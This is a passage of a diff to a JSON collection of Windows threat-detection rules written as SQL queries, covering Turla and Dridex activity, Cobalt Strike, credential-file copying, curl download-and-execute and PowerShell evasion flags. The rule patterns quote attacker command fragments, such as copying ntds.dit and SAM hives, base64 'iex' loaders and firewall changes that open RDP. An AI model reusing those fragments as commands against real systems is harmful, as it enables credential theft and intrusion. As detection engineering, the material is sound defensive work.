/i:http://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://9%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://9%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/delete%' ESCAPE '\\' AND CommandLine LIKE '%/tn%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_http_pattern.yml" + "filename": "proc_creation_win_schtasks_delete.yml" }, { - "title": "Potential Unquoted Service Path Reconnaissance Via Wmic.EXE", - "id": "68bcd73b-37ef-49cb-95fc-edc809730be6", - "status": "experimental", - "description": "Detects known WMI recon method to look for unquoted service paths using wmic. 
Often used by pentester and attacker enumeration scripts", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Turla Group Commands May 2020", + "id": "9e2e51c5-c699-4794-ba5a-29f5da40ac0c", + "status": "test", + "description": "Detects commands used by Turla group as reported by ESET in May 2020", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.g0010", "attack.execution", - "attack.t1047" + "attack.t1059.001", + "attack.t1053.005", + "attack.t1027" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'wmic.exe' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '% service get %' ESCAPE '\\' AND CommandLine LIKE '%name,displayname,pathname,startmode%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%tracert -h 10 yahoo.com%' ESCAPE '\\' OR CommandLine LIKE '%.WSqmCons))|iex;%' ESCAPE '\\' OR CommandLine LIKE '%Fr`omBa`se6`4Str`ing%' ESCAPE '\\') OR (CommandLine LIKE '%net use https://docs.live.net%' ESCAPE '\\' AND CommandLine LIKE '%@aol.co.uk%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_recon_unquoted_service_search.yml" + "filename": "proc_creation_win_apt_turla_comrat_may20.yml" }, { - "title": "Sysmon Driver Unloaded Via Fltmc.EXE", - "id": "4d7cda18-1b12-4e52-b45c-d28653210df8", - "status": "test", - "description": "Detects possible Sysmon filter driver unloaded via fltmc.exe", - "author": "Kirill Kiryanov, oscd.community", + "title": "Rundll32 UNC Path Execution", + "id": "5cdb711b-5740-4fb2-ba88-f7945027afac", + "status": "experimental", + "description": "Detects rundll32 execution where the DLL is located on a remote location (share)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1070", - "attack.t1562", - "attack.t1562.002" + 
"attack.execution", + "attack.t1021.002", + "attack.t1218.011" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND (CommandLine LIKE '%unload%' ESCAPE '\\' AND CommandLine LIKE '%sysmon%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_fltmc_unload_driver_sysmon.yml" + "filename": "proc_creation_win_rundll32_unc_path.yml" }, { - "title": "Regsvr32 Flags Anomaly", - "id": "b236190c-1c61-41e9-84b3-3fe03f6d76b0", + "title": "Copying Sensitive Files with Credential Data", + "id": "e7be6119-fc37-43f0-ad4f-1f3f99be2f9f", "status": "test", - "description": "Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time", - "author": "Florian Roth (Nextron Systems)", + "description": "Files with well-known filenames (sensitive files with credential data) copying", + "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.003", + "car.2013-07-001", + "attack.s0404" ], "falsepositives": [ - "Unknown" + "Copying sensitive files for legitimate use (eg. 
backup) or forensic investigation by legitimate incident responder or forensic invetigator" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '% /i:%' ESCAPE '\\') AND NOT (CommandLine LIKE '% /n %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\esentutl.exe' ESCAPE '\\') AND (CommandLine LIKE '%vss%' ESCAPE '\\' OR CommandLine LIKE '% /m %' ESCAPE '\\' OR CommandLine LIKE '% /y %' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\system %' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\security%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_regsvr32_flags_anomaly.yml" + "filename": "proc_creation_win_esentutl_sensitive_file_copy.yml" }, { - "title": "Suspicious PowerShell Parameter Substring", - "id": "36210e0d-5b19-485d-a087-c096088885f0", - "status": "test", - "description": "Detects suspicious PowerShell invocation with a parameter substring", - "author": "Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)", + "title": "Renamed PsExec Service Execution", + "id": "51ae86a2-e2e1-4097-ad85-c46cb6851de4", + "status": "experimental", + "description": "Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators", + 
"author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate administrative tasks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% -windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% -windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% -windowst h%' ESCAPE '\\' OR CommandLine LIKE '% -windows h%' ESCAPE '\\' OR CommandLine LIKE '% -windo h%' ESCAPE '\\' OR CommandLine LIKE '% -wind h%' ESCAPE '\\' OR CommandLine LIKE '% -win h%' ESCAPE '\\' OR CommandLine LIKE '% -wi h%' ESCAPE '\\' OR CommandLine LIKE '% -win h %' ESCAPE '\\' OR CommandLine LIKE '% -win hi %' ESCAPE '\\' OR CommandLine LIKE '% -win hid %' ESCAPE '\\' OR CommandLine LIKE '% -win hidd %' ESCAPE '\\' OR CommandLine LIKE '% -win hidde %' ESCAPE '\\' OR CommandLine LIKE '% -NoPr %' ESCAPE '\\' OR CommandLine LIKE '% -NoPro %' ESCAPE '\\' OR CommandLine LIKE '% -NoProf %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% -nonin %' ESCAPE '\\' OR CommandLine LIKE '% -nonint %' ESCAPE '\\' OR CommandLine LIKE '% -noninte %' ESCAPE '\\' OR CommandLine LIKE '% -noninter %' ESCAPE '\\' OR CommandLine LIKE '% -nonintera %' ESCAPE '\\' OR CommandLine LIKE '% -noninterac %' ESCAPE '\\' OR CommandLine LIKE '% -noninteract %' ESCAPE '\\' OR CommandLine LIKE '% -noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% -noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% -ec %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCom %' ESCAPE '\\' OR 
CommandLine LIKE '% -encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% -encodedC %' ESCAPE '\\' OR CommandLine LIKE '% -encoded %' ESCAPE '\\' OR CommandLine LIKE '% -encode %' ESCAPE '\\' OR CommandLine LIKE '% -encod %' ESCAPE '\\' OR CommandLine LIKE '% -enco %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% -executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% -executionpol %' ESCAPE '\\' OR CommandLine LIKE '% -executionpo %' ESCAPE '\\' OR CommandLine LIKE '% -executionp %' ESCAPE '\\' OR CommandLine LIKE '% -execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass%' ESCAPE '\\' OR CommandLine LIKE '% /windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% /windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% /windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% /windowst h%' ESCAPE '\\' OR CommandLine LIKE '% /windows h%' ESCAPE '\\' OR CommandLine LIKE '% /windo h%' ESCAPE '\\' OR CommandLine LIKE '% /wind h%' ESCAPE '\\' OR CommandLine LIKE '% /win h%' ESCAPE '\\' OR CommandLine LIKE '% /wi h%' ESCAPE '\\' OR CommandLine LIKE '% /win h %' ESCAPE '\\' OR CommandLine LIKE '% /win hi %' ESCAPE '\\' OR CommandLine LIKE '% /win hid %' ESCAPE '\\' OR CommandLine LIKE '% /win hidd %' ESCAPE '\\' OR CommandLine LIKE '% /win hidde %' ESCAPE '\\' OR CommandLine LIKE '% /NoPr %' ESCAPE '\\' OR CommandLine LIKE '% /NoPro %' ESCAPE '\\' OR CommandLine LIKE '% /NoProf %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% /nonin %' ESCAPE '\\' OR CommandLine LIKE '% 
/nonint %' ESCAPE '\\' OR CommandLine LIKE '% /noninte %' ESCAPE '\\' OR CommandLine LIKE '% /noninter %' ESCAPE '\\' OR CommandLine LIKE '% /nonintera %' ESCAPE '\\' OR CommandLine LIKE '% /noninterac %' ESCAPE '\\' OR CommandLine LIKE '% /noninteract %' ESCAPE '\\' OR CommandLine LIKE '% /noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% /noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% /ec %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% /encodedC %' ESCAPE '\\' OR CommandLine LIKE '% /encoded %' ESCAPE '\\' OR CommandLine LIKE '% /encode %' ESCAPE '\\' OR CommandLine LIKE '% /encod %' ESCAPE '\\' OR CommandLine LIKE '% /enco %' ESCAPE '\\' OR CommandLine LIKE '% /en %' ESCAPE '\\' OR CommandLine LIKE '% /executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% /executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% /executionpol %' ESCAPE '\\' OR CommandLine LIKE '% /executionpo %' ESCAPE '\\' OR CommandLine LIKE '% /executionp %' ESCAPE '\\' OR CommandLine LIKE '% /execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ep bypass%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'psexesvc.exe' AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_susp_parameter_variation.yml" + "filename": 
"proc_creation_win_renamed_sysinternals_psexec_service.yml" }, { - "title": "Suspicious File Download via CertOC.exe", - "id": "70ad0861-d1fe-491c-a45f-fa48148a300d", - "status": "experimental", - "description": "Detects when a user downloads file by using CertOC.exe", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Dridex Activity", + "id": "e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e", + "status": "stable", + "description": "Detects potential Dridex acitvity via specific process patterns", + "author": "Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055", + "attack.discovery", + "attack.t1135", + "attack.t1033" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND CommandLine LIKE '%-GetCACAPS%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') AND NOT (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '% -s %' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.dll%' ESCAPE '\\'))) OR (ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' AND CommandLine LIKE '% /all%' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND 
CommandLine LIKE '% view%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_lolbin_certoc_download.yml" + "filename": "proc_creation_win_malware_dridex.yml" }, { - "title": "Suspicious Schtasks From Env Var Folder", - "id": "81325ce1-be01-4250-944f-b4789644556f", - "status": "experimental", - "description": "Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware", - "author": "Florian Roth (Nextron Systems)", + "title": "RDP Connection Allowed Via Netsh.EXE", + "id": "01aeb693-138d-49d2-9403-c4f52d7d3d62", + "status": "test", + "description": "Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware", + "author": "Sander Wiebing", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1562.004" ], "falsepositives": [ - "Benign scheduled tasks creations or executions that happen often during software installations", - "Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders" + "Legitimate administration activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\')) OR (ParentCommandLine LIKE '%\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND (CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE 
'%C:\\\\Perflogs%' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%update\\_task.xml%' ESCAPE '\\' OR CommandLine LIKE '%/Create /TN TVInstallRestore /TR%' ESCAPE '\\') OR ParentCommandLine LIKE '%unattended.ini%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /Xml \"C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\.CR.%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_Security\\_Installation.xml%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /F /TN%' ESCAPE '\\' AND CommandLine LIKE '%/Xml %' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_%' ESCAPE '\\' AND (CommandLine LIKE '%.tmp\\\\UpdateFallbackTask.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\WatchdogServiceControlManagerTimeout.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\SystrayAutostart.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\MaintenanceTask.xml%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/Create /TN \"klcp\\_update\" /XML %' ESCAPE '\\' AND CommandLine LIKE '%\\\\klcp\\_update\\_task.xml%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%firewall %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%tcp %' ESCAPE '\\' AND CommandLine LIKE '%3389%' ESCAPE '\\') AND (CommandLine LIKE '%portopening%' ESCAPE '\\' OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%allow%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_schtasks_env_folder.yml" + "filename": "proc_creation_win_netsh_fw_allow_rdp.yml" }, { - "title": "Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS", - "id": "07aa184a-870d-413d-893a-157f317f6f58", + "title": "PowerShell Base64 Encoded Invoke Keyword", + "id": 
"6385697e-9f1b-40bd-8817-f4a91f40508e", "status": "test", - "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". Which can be used to gather information about the target machine", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls", + "author": "pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t", "tags": [ - "attack.discovery", "attack.execution", - "attack.t1615", - "attack.t1059.005" + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%gatherNetworkInfo.vbs%' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '% -e%' ESCAPE '\\' AND (CommandLine LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR CommandLine LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR CommandLine LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\' OR CommandLine LIKE '%SW52b2tlL%' ESCAPE '\\' OR CommandLine LIKE '%ludm9rZS%' ESCAPE '\\' OR CommandLine LIKE '%JbnZva2Ut%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_gather_network_info_execution.yml" + "filename": "proc_creation_win_powershell_base64_invoke.yml" }, { - "title": "Suspicious RazerInstaller Explorer Subprocess", - "id": "a4eaf250-7dc1-4842-862a-5e71cd59a167", - "status": "test", - "description": "Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges 
to LOCAL SYSTEM", - "author": "Florian Roth (Nextron Systems), Maxime Thiebaut", + "title": "Suspect Svchost Activity", + "id": "16c37b52-b141-42a5-a3ea-bbe098444397", + "status": "experimental", + "description": "It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.", + "author": "David Burkett, @signalblur", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1553" + "attack.t1055" ], "falsepositives": [ - "User selecting a different installation folder (check for other sub processes of this explorer.exe process)" + "Rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\RazerInstaller.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\Razer\\\\Installer\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rpcnetp.exe' ESCAPE '\\') OR CommandLine = ''))" ], - "filename": "proc_creation_win_exploit_other_razorinstaller_lpe.yml" + "filename": "proc_creation_win_svchost_execution_with_no_cli_flags.yml" }, { - "title": "Potential Meterpreter/CobaltStrike Activity", - "id": "15619216-e993-4721-b590-4c520615a67d", - "status": "test", - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "title": "HackTool - Certify Execution", + "id": 
"762f2482-ff21-4970-8939-0aa317a886bb", + "status": "experimental", + "description": "Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.discovery", + "attack.credential_access", + "attack.t1649" ], "falsepositives": [ - "Commandlines containing components like cmd accidentally", - "Jobs and services started with cmd" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%\\\\pipe\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%cmd%' ESCAPE '\\' OR CommandLine LIKE '%\\%COMSPEC\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%.dll,a%' ESCAPE '\\' AND CommandLine LIKE '%/p:%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%MpCmdRun%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Certify.exe' ESCAPE '\\' OR OriginalFileName = 'Certify.exe' OR Description LIKE '%Certify%' ESCAPE '\\') OR ((CommandLine LIKE '%.exe cas %' ESCAPE '\\' OR CommandLine LIKE '%.exe find %' ESCAPE '\\' OR CommandLine LIKE '%.exe pkiobjects %' ESCAPE '\\' OR CommandLine LIKE '%.exe request %' ESCAPE '\\' OR CommandLine LIKE '%.exe download %' ESCAPE '\\') AND (CommandLine LIKE '% /vulnerable%' ESCAPE '\\' OR CommandLine LIKE '% /template:%' ESCAPE '\\' OR CommandLine LIKE '% /altname:%' ESCAPE '\\' OR CommandLine LIKE '% /domain:%' ESCAPE '\\' OR CommandLine LIKE '% /path:%' ESCAPE '\\' OR CommandLine LIKE '% /ca:%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hktl_meterpreter_getsystem.yml" + "filename": "proc_creation_win_hktl_certify.yml" }, { 
- "title": "CobaltStrike Load by Rundll32", - "id": "ae9c6a7c-9521-42a6-915e-5aaa8689d529", + "title": "Curl Download And Execute Combination", + "id": "21dd6d38-2b18-4453-9404-a0fe4a0cc288", "status": "test", - "description": "Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.", - "author": "Wojciech Lesicki", + "description": "Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.", + "author": "Sreeman, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.execution", + "attack.t1218", + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' OR CommandLine LIKE '%rundll32 %' ESCAPE '\\')) AND (CommandLine LIKE '%.dll%' ESCAPE '\\' AND (CommandLine LIKE '% StartW' ESCAPE '\\' OR CommandLine LIKE '%,StartW' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '%curl %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%-o%' ESCAPE '\\' AND CommandLine LIKE '%&%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml" + "filename": "proc_creation_win_cmd_curl_download_exec_combo.yml" }, { - "title": "MSHTA Suspicious Execution 01", - "id": "cc7abbd0-762b-41e3-8a26-57ad50d2eea3", - "status": "test", - "description": "Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism", - "author": "Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)", + "title": "DLL Sideloading by VMware Xfer Utility", + "id": 
